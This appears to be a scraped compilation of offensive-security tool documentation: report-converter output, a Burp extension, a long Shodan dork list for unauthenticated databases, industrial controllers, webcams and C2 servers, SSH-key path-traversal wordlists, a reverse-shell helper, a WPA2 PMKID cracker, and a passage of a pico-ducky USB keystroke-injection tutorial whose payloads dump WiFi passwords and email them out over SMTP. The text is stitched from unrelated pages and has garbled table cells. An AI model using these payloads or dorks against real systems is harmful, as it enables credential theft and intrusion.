| 192.168.142.4 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.4 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.4 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.4 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.4 | 3389 | 51192 | SSL Certificate Can not Be Trusted | 2 | X |
| 192.168.142.2 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.2 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| 192.168.142.2 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.2 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.2 | 3389 | 45411 | S SL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.2 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.2 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.2 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.2 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
| 192.168.142.2 | 445 | 57608 | SMB Signing not required | 2 | X |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
Or to output a CSV file:
$ sr2t --nessus example/nessus.nessus -oC example
$ cat example_nessus.csv
host,port,plugin id,plugin name,severity,annotations
192.168.142.4,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.4,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.4,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.4,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.4,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.4,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.4,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.2,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.2,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.2,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.2,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.2,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.2,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,44 5,57608,SMB Signing not required,2,X
To produce an XLSX format:
$ sr2t --nmap example/nmap.xml -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --nmap example/nmap.xml --nmap-services
Nmap TCP:
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| 192.168.23.78 | X | | X | X | X | X | X | X | | |
| 192.168.27.243 | | | | X | X | | X | X | X | X |
| 192.168.99.164 | | | | X | X | | X | X | X | X |
| 192.168.228.211 | | X | | | | | | | | |
| 192.168.171.74 | | | | X | X | | X | X | X | X |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
Nmap Services:
+-----------------+------+-------+---------------+-------+
| ip address | port | proto | service | state |
+--------------- --+------+-------+---------------+-------+
| 192.168.23.78 | 53 | tcp | domain | open |
| 192.168.23.78 | 88 | tcp | kerberos-sec | open |
| 192.168.23.78 | 135 | tcp | msrpc | open |
| 192.168.23.78 | 139 | tcp | netbios-ssn | open |
| 192.168.23.78 | 389 | tcp | ldap | open |
| 192.168.23.78 | 445 | tcp | microsoft-ds | open |
| 192.168.23.78 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 135 | tcp | msrpc | open |
| 192.168.27.243 | 139 | tcp | netbios-ssn | open |
| 192.168.27.243 | 445 | tcp | microsoft-ds | open |
| 192.168.27.243 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 5800 | tcp | vnc-http | open |
| 192.168.27.243 | 5900 | tcp | vnc | open |
| 192.168.99.164 | 135 | tcp | msrpc | open |
| 192.168.99.164 | 139 | tcp | netbios-ssn | open |
| 192 .168.99.164 | 445 | tcp | microsoft-ds | open |
| 192.168.99.164 | 3389 | tcp | ms-wbt-server | open |
| 192.168.99.164 | 5800 | tcp | vnc-http | open |
| 192.168.99.164 | 5900 | tcp | vnc | open |
| 192.168.228.211 | 80 | tcp | http | open |
| 192.168.171.74 | 135 | tcp | msrpc | open |
| 192.168.171.74 | 139 | tcp | netbios-ssn | open |
| 192.168.171.74 | 445 | tcp | microsoft-ds | open |
| 192.168.171.74 | 3389 | tcp | ms-wbt-server | open |
| 192.168.171.74 | 5800 | tcp | vnc-http | open |
| 192.168.171.74 | 5900 | tcp | vnc | open |
+-----------------+------+-------+---------------+-------+
Or to output a CSV file:
$ sr2t --nmap example/nmap.xml -oC example
$ cat example_nmap_tcp.csv
ip address,53,80,88,135,139,389,445,3389,5800,5900
192.168.23.78,X,,X,X,X,X,X,X,,
192.168.27.243,,,,X,X,,X,X,X,X
192.168.99.164,,,,X,X,,X,X,X,X
192.168.228.211,,X,,,,,,,,
192.168.171.74,,,,X,X,,X,X,X,X
To produce an XLSX format:
$ sr2t --nikto example/nikto.xml -oX example/nikto.xlsx
To produce an text tabular format to stdout:
$ sr2t --nikto example/nikto.xml
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| target ip | target hostname | target port | description | annotations |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| 192.168.178.10 | 192.168.178.10 | 80 | The anti-clickjacking X-Frame-Options header is not present. | X |
| 192.168.178.10 | 192.168.178.10 | 80 | The X-XSS-Protection header is not defined. This header can hint to the user | X |
| | | | agent to protect against some forms of XSS | |
| 192.168.178.10 | 192.168.178.10 | 8 0 | The X-Content-Type-Options header is not set. This could allow the user agent to | X |
| | | | render the content of the site in a different fashion to the MIME type | |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
Or to output a CSV file:
$ sr2t --nikto example/nikto.xml -oC example
$ cat example_nikto.csv
target ip,target hostname,target port,description,annotations
192.168.178.10,192.168.178.10,80,The anti-clickjacking X-Frame-Options header is not present.,X
192.168.178.10,192.168.178.10,80,"The X-XSS-Protection header is not defined. This header can hint to the user
agent to protect against some forms of XSS",X
192.168.178.10,192.168.178.10,80,"The X-Content-Type-Options header is not set. This could allow the user agent to
render the content of the site in a different fashion to the MIME type",X
To produce an XLSX format:
$ sr2t --dirble example/dirble.xml -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --dirble example/dirble.xml
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| url | code | content len | is directory | is listable | found from listable | redirect url | annotations |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| http://example.org/flv | 0 | 0 | false | false | false | | X |
| http://example.org/hire | 0 | 0 | false | false | false | | X |
| http://example.org/phpSQLiteAdmin | 0 | 0 | false | false | false | | X |
| http://example.org/print_order | 0 | 0 | false | false | fa lse | | X |
| http://example.org/putty | 0 | 0 | false | false | false | | X |
| http://example.org/receipts | 0 | 0 | false | false | false | | X |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
Or to output a CSV file:
$ sr2t --dirble example/dirble.xml -oC example
$ cat example_dirble.csv
url,code,content len,is directory,is listable,found from listable,redirect url,annotations
http://example.org/flv,0,0,false,false,false,,X
http://example.org/hire,0,0,false,false,false,,X
http://example.org/phpSQLiteAdmin,0,0,false,false,false,,X
http://example.org/print_order,0,0,false,false,false,,X
http://example.org/putty,0,0,false,false,false,,X
http://example.org/receipts,0,0,false,false,false,,X
To produce an XLSX format:
$ sr2t --testssl example/testssl.json -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --testssl example/testssl.json
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| ip address | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| rc4-md5.badssl.com/104.154.89.105 | 443 | X | X | X | X | X | X | X | X |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
Or to output a CSV file:
$ sr2t --testssl example/testssl.json -oC example
$ cat example_testssl.csv
ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard
rc4-md5.badssl.com/104.154.89.105,443,X,X,X,X,X,X,X,X
To produce an XLSX format:
$ sr2t --fortify example/fortify.fpr -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --fortify example/fortify.fpr
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| | type | subtype | severity | confidence | annotations |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| example1/web.xml:135:135 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example2/web.xml:150:150 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example3/web.xml:109:109 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example4/web.xml:108:108 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example5/web.xml:166:166 | J2EE Misconfiguration | Inse cure Transport | 3.0 | 5.0 | X |
| example6/web.xml:2:2 | J2EE Misconfiguration | Excessive Session Timeout | 3.0 | 5.0 | X |
| example7/web.xml:162:162 | J2EE Misconfiguration | Missing Authentication Method | 3.0 | 5.0 | X |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
Or to output a CSV file:
$ sr2t --fortify example/fortify.fpr -oC example
$ cat example_fortify.csv
,type,subtype,severity,confidence,annotations
example1/web.xml:135:135,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example2/web.xml:150:150,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example3/web.xml:109:109,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example4/web.xml:108:108,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example5/web.xml:166:166,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example6/web.xml:2:2,J2EE Misconfiguration,Excessive Session Timeout,3.0,5.0,X
example7/web.xml:162:162,J2EE Misconfiguration,Missing Authentication Method,3.0,5.0,X
WW4L3VCX11zWgKPX51TRw2RENe8STkbCkh5wTV4GuQnbZ1fKYmPFobZhEfS1G9G3vwjBhzioi3vx8JgBx2xLxe4N1gtJee8Mp
This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.
jython-standalone-2.7.3.jar
.java -jar jython-standalone-2.7.3.jar -m ensurepip
.GAP.py
and requirements.txt
from this project and place in the same directory.java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt
.Or you can right click a request or response in any other context and select GAP from the Extensions menu.
If you don't need one of the modes, then un-check it as results will be quicker.
If you run GAP for one or more targets from the Site Map view, don't have them expanded when you run GAP... unfortunately this can make it a lot slower. It will be more efficient if you run for one or two target in the Site Map view at a time, as huge projects can have consume a lot of resources.
If you want to run GAP on one of more specific requests, do not select them from the Site Map tree view. It will be a lot quicker to run it from the Site Map Contents view if possible, or from proxy history.
It is hard to design GAP to display all controls for all screen resolutions and font sizes. I have tried to deal with the most common setups, but if you find you cannot see all the controls, you can hold down the Ctrl
button and click the GAP logo header image to remove it to make more space.
The Words mode uses the beautifulsoup4
library and this can be quite slow, so be patient!
Below is an in-depth look at the GAP Burp extension, from installing it successfully, to explaining all of the features.
NOTE: This video is from 16th July 2023 and explores v3.X, so any features added after this may not be featured.
Tentaive
Issues, e.g. Parameters that were found in the Response (but not as query parameters in links found).beautifulsoup4
that is faster to parse responses for Words.Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! โ (I could use the caffeine!)
๐ค /XNL-h4ck3r
Feel free to make suggestions
Find devices in a particular city. city:"Bangalore"
Find devices in a particular country. country:"IN"
Find devices by giving geographical coordinates. geo:"56.913055,118.250862"
country:us
country:ru country:de city:chicago
Find devices matching the hostname. server: "gws" hostname:"google"
hostname:example.com -hostname:subdomain.example.com
hostname:example.com,example.org
Find devices based on an IP address or /x CIDR. net:210.214.0.0/16
org:microsoft
org:"United States Department"
asn:ASxxxx
Find devices based on operating system. os:"windows 7"
Find devices based on open ports. proftpd port:21
Find devices before or after between a given time. apache after:22/02/2009 before:14/3/2010
Self signed certificates ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com
Expired certificates ssl.cert.expired:true
ssl.cert.subject.cn:example.com
device:firewall
device:router
device:wap
device:webcam
device:media
device:"broadband router"
device:pbx
device:printer
device:switch
device:storage
device:specialized
device:phone
device:"voip"
device:"voip phone"
device:"voip adaptor"
device:"load balancer"
device:"print server"
device:terminal
device:remote
device:telecom
device:power
device:proxy
device:pda
device:bridge
os:"windows 7"
os:"windows server 2012"
os:"linux 3.x"
product:apache
product:nginx
product:android
product:chromecast
cpe:apple
cpe:microsoft
cpe:nginx
cpe:cisco
server: nginx
server: apache
server: microsoft
server: cisco-ios
dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0
http.html:/dana-na
http.title:"Index of /" http.html:".pem"
onion-location
"product:MySQL"
mysql port:"3306"
"product:MongoDB"
mongodb port:27017
"MongoDB Server Information { "metrics":"
"Set-Cookie: mongo-express=" "200 OK"
"MongoDB Server Information" port:27017 -authentication
kibana content-legth:217
port:9200 json
port:"9200" all:elastic
port:"9200" all:"elastic indices"
"product:Memcached"
"product:CouchDB"
port:"5984"+Server: "CouchDB/2.1.0"
"port:5432 PostgreSQL"
"port:8087 Riak"
"product:Redis"
"product:Cassandra"
"Server: Prismview Player"
"in-tank inventory" port:10001
No auth required to access CLI terminal. "privileged command" GET
P372 "ANPR enabled"
mikrotik streetlight
"voter system serial" country:US
May allow for ATM Access availability NCR Port:"161"
"Cisco IOS" "ADVIPSERVICESK9_LI-M"
"[2J[H Encartele Confidential"
http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2
"Server: gSOAP/2.8" "Content-Length: 583"
Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!
"Cobham SATCOM" OR ("Sailor" "VSAT")
title:"Slocum Fleet Mission Control"
"Server: CarelDataServer" "200 Document follows"
http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"
"[1m[35mWelcome on console"
Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.
"DICOM Server Response" port:104
"Server: EIG Embedded Web Server" "200 Document follows"
"Siemens, SIMATIC" port:161
"Server: Microsoft-WinCE" "Content-Length: 12581"
"HID VertX" port:4070
"log off" "select the appropriate"
Helps to find the charging status of tesla powerpack. http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2
title:"xzeres wind"
"html:"PIPS Technology ALPR Processors""
"port:502"
"port:1911,4911 product:Niagara"
"port:18245,18246 product:"general electric""
"port:5006,5007 product:mitsubishi"
"port:2455 operating system"
"port:102"
"port:47808"
"port:5094 hart-ip"
"port:9600 response code"
"port:2404 asdu address"
"port:20000 source address"
"port:44818"
"port:1962 PLC"
"port:789 product:"Red Lion Controls"
"port:20547 PLC"
"authentication disabled" port:5900,5901
"authentication disabled" "RFB 003.008"
99.99% are secured by a secondary Windows login screen.
"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"
product:"cobalt strike team server"
product:"Cobalt Strike Beacon"
ssl.cert.serial:146473198
- default certificate serial number ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1
ssl:foren.zik
http.html_hash:-1957161625
product:"Brute Ratel C4"
ssl:"Covenant" http.component:"Blazor"
ssl:"MetasploitSelfSignedCA"
Routers which got compromised hacked-router-help-sos
product:"Redis key-value store"
Find Citrix Gateway. title:"citrix gateway"
Command-line access inside Kubernetes pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.
title:"Weave Scope" http.favicon.hash:567176827
"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"
Jenkins Unrestricted Dashboard x-jenkins 200
"Docker Containers:" port:2375
"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab
"dnsmasq-pi-hole" "Recursion: enabled"
"port: 53" Recursion: Enabled
"root@" port:23 -login -password -name -Session
NO password required for telnet access. port:23 console gateway
"polycom command shell"
nport -keyin port:23
A tangential result of Google's sloppy fractured update approach. ๐ More information here.
"Android Debug Bridge" "Device" port:5555
Lantronix password port:30718 -secured
"Citrix Applications:" port:1604
Vulnerable (kind of "by design," but especially when exposed).
"smart install client active"
PBX "gateway console" -password port:23
http.title:"- Polycom" "Server: lighttpd"
"Polycom Command Shell" -failed port:23
"Polycom Command Shell" -failed port:23
Example: Polycom Video Conferencing
"Server: Bomgar" "200 OK"
"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995
"Active Management Technology"
HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900
"Press Enter for Setup Mode port:9999"
Helps to find the cleartext wifi passwords in Shodan. html:"def_wirelesspassword"
The wp-config.php if accessed can give out the database credentials. http.html:"* The wp-config.php creation script uses this file"
"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"
"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392
"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"
"X-MS-Server-Fqdn"
Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.
"Authentication: disabled" port:445
"Authentication: disabled" NETLOGON SYSVOL -unix port:445
"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445
"220" "230 Login successful." port:21
"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"
Redirecting sencha port:9000
"Server: Logitech Media Server" "200 OK"
Example: Logitech Media Servers
"X-Plex-Protocol" "200 OK" port:32400
"CherryPy/5.1.0" "/home"
"IPC$ all storage devices"
title:camera
webcam has_screenshot:true
"d-Link Internet Camera, 200 OK"
"Hipcam RealServer/V1.0"
"Server: yawcam" "Mime-Type: text/html"
("webcam 7" OR "webcamXP") http.component:"mootools" -401
"Server: IP Webcam Server" "200 OK"
html:"DVR_H264 ActiveX"
With username:admin and password: :P NETSurveillance uc-httpd
Server: uc-httpd 1.0.0
"Serial Number:" "Built:" "Server: HP HTTP"
ssl:"Xerox Generic Root"
"SERVER: EPSON_Linux UPnP" "200 OK"
"Server: EPSON-HTTP" "200 OK"
"Server: KS_HTTP" "200 OK"
"Server: CANON HTTP Server"
"Server: AV_Receiver" "HTTP/1.1 406"
Apple TVs, HomePods, etc.
"\x08_airplay" port:5353
"Chromecast:" port:8008
"Model: PYNG-HUB"
"Server: calibre" http.status:200 http.title:calibre
title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944
"ETH - Total speed"
Substitute .pem with any extension or a filename like phpinfo.php.
http.title:"Index of /" http.html:".pem"
Exposed wp-config.php files containing database credentials.
http.html:"* The wp-config.php creation script uses this file"
"Minecraft Server" "protocol 340" port:25565
net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24
SSH Private Key Looting Wordlists. A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names.
?file=../../../../../../../../home/user/.ssh/id_rsa
?file=../../../../../../../../home/user/.ssh/id_rsa-cert
This repository contains a collection of wordlists to aid in locating or brute-forcing SSH private key file names. These wordlists can be useful for penetration testers, security researchers, and anyone else interested in assessing the security of SSH configurations.
These wordlists can be used with tools such as Burp Intruder, Hydra, custom python scripts, or any other bruteforcing tool that supports custom wordlists. They can help expand the scope of your brute-forcing or enumeration efforts when targeting SSH private key files.
This wordlist repository was inspired by John Hammond in his vlog "Don't Forget This One Hacking Trick."
Please use these wordlists responsibly and only on systems you are authorized to test. Unauthorized use is illegal.
WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.
git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
cd web-wordlist-generator && pip3 install -r requirements.txt
python3 generator.py -d target-web.com
You can run this application on a container after build a Dockerfile.
docker build -t webwordlistgenerator .
docker run webwordlistgenerator -d target-web.com -o
You can run this application on a container after pulling from DockerHub.
docker pull osmankandemir/webwordlistgenerator:v1.0
docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o
-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains target-web1.com target-web2.com
-p PROXY, --proxy PROXY Use HTTP proxy. --proxy 0.0.0.0:8080
-a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
-o PRINT, --print PRINT Use Print outputs on terminal screen.
secbutler
is a utility tool made for pentesters, bug-bounty hunters and security researchers that contains all the most used and tedious stuff commonly used while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).
The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!
secbutler -h
This will display the help for the tool
__ __ __
________ _____/ /_ __ __/ /_/ /__ _____
/ ___/ _ \/ ___/ __ \/ / / / __/ / _ \/ ___/
(__ ) __/ /__/ /_/ / /_/ / /_/ / __/ /
/____/\___/\___/_.___/\__,_/\__/_/\___/_/
v0.1.9 - https://github.com/groundsec/secbutler
Essential utilities for pentester, bug-bounty hunters and security researchers
Usage:
secbutler [flags]
secbutler [command]
Available Commands:
cheatsheet Read common cheatsheets & payloads
help Help about any command
listener Obtain the command to start a reverse shell listener
payloads Obtain and serve common payloads
proxy Obtain a random proxy from FreeProxy
revshell Obtain the command for a reverse shell
tools Generate a install script for the most common cybersecurity tools
version Print the current version
wordlists Generate a download script for the most common wordlists
Flags:
-h, --help help for secbutler
Use "secbutler [command] --help" for more information about a command.
Run the following command to install the latest version:
go install github.com/groundsec/secbutler@latest
Or you can simply grab an executable from the Releases page.
secbutler is made with ๐ค by the GroundSec team and released under the MIT LICENSE.
This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.
python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>
NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9
The two main formulas to obtain a PMKID are as follows:
This is just for understanding, both are already implemented in find_pw_chunk
and calculate_pmkid
.
Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.
*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.
To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.
Open the pcap in WireShark:
wlan_rsna_eapol.keydes.msgnr == 1
in WireShark to display only EAPOL message 1 packets.If access point is vulnerable, you should see the PMKID value like the below screenshot:
This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.
Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.
Disclaimer: All content in this project is intended for security research purpose only.
ย
During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).
After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.
Physical access to victim's computer.
Unlocked victim's computer.
Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.
Knowledge of victim's computer password for the Linux exploit.
Note:
It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.
However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.
In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.
Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.
The payload uses STRING
command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER
/SPACE
will simulate a press of keyboard keys.
We use DELAY
command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.
Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:
This approach was used for the Windows exploit. The whole payload can be seen here.
This approach was used for the Linux exploit. The whole payload can be seen here.
In order to use the Windows payload (payload1.dd
), you don't need to connect any jumper wire between pins.
Once passwords have been exported to the .txt
file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL
, SENDER_EMAIL
and yours email PASSWORD
. In addition, you could also update the body and the subject of the email.
STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587 |
๏ Note:
After sending data over the email, the
.txt
file is deleted.You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.
Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.
In order to use the Linux payload (payload2.dd
) you need to connect a jumper wire between GND
and GPIO5
in order to comply with the code in code.py
on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.
Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK
with the name of your USB drive in two places.
STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt |
STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt |
In addition, you will also need to update the Linux PASSWORD
in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.
STRING echo PASSWORD | sudo -S echo |
STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')" |
In order to run the wifi_passwords_print.sh
script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:
echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK
where PASSWORD
is your account's password and USBSTICK
is the name for your USB device.
NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style
keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep
command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)
). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).*
